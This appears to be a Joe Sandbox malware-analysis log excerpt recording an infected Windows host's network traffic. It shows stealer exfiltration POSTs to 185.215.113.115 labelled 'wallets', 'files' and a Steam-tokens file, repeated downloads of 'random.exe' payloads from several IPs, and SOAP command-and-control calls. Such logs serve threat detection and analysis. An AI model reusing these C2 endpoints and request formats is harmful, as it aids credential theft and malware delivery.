Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 2d 2d 0d 0a Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="message"wallets------CBAKFCBFHJDHJKECAKEH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"files------FBFCGIDAKECGCBGDBAFI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJDBFBKKJEBFHJEHJDHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="file"------BKKJDBFBKKJEBFHJEHJD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCGHIJKEGIECBFCBAEHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 47 48 49 4a 4b 45 47 49 45 43 42 46 43 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 47 48 49 4a 4b 45 47 49 45 43 42 46 43 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 47 48 49 4a 4b 45 47 49 45 43 42 46 43 42 41 45 2d 2d 0d 0a Data Ascii: ------HDGCGHIJKEGIECBFCBAEContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------HDGCGHIJKEGIECBFCBAEContent-Disposition: form-data; name="message"ybncbhylepme------HDGCGHIJKEGIECBFCBAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 2d 2d 0d 0a Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJDHIDBFBFHIJKFHCGIE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 34 32 45 37 33 42 34 35 42 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B42E73B45B82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062348001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /ZhnSMEmOyBahvsfTCosA1738232489 HTTP/1.1Host: home.fivegg5th.topAccept: /Content-Type: application/jsonContent-Length: 442981Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 32 30 32 37 30 38 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062349001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /ZhnSMEmOyBahvsfTCosA1738232489?argument=0 HTTP/1.1Host: home.fivegg5th.topAccept: /
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /ZhnSMEmOyBahvsfTCosA1738232489 HTTP/1.1Host: home.fivegg5th.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062350001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062351001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062352001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 31 32 44 34 41 44 44 35 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="hwid"1712D4ADD51E2643095942------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build"kira------DHCAAEBKEGHJKEBFHJDB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062353001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062354001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/Savelij_sL/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 103.84.89.222:33791Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062356001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062357001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/Jz1e1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062358001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/drainisback/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 31 32 44 34 41 44 44 35 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 2d 2d 0d 0a Data Ascii: ------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="hwid"1712D4ADD51E2643095942------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="build"kira------KKFBAAFCGIEGDHIEBFII--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 31 32 44 34 41 44 44 35 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="hwid"1712D4ADD51E2643095942------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build"kira------ECGHJJEHDHCAAKFIIDGI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062359001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 103.84.89.222:33791Content-Length: 3467430Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 103.84.89.222:33791Content-Length: 3467422Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 31 32 44 34 41 44 44 35 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="hwid"1712D4ADD51E2643095942------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="build"kira------FIDAFCAFCBKECBGCFIIJ--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 172.67.75.172 172.67.75.172

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.181.203:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.181.203:443
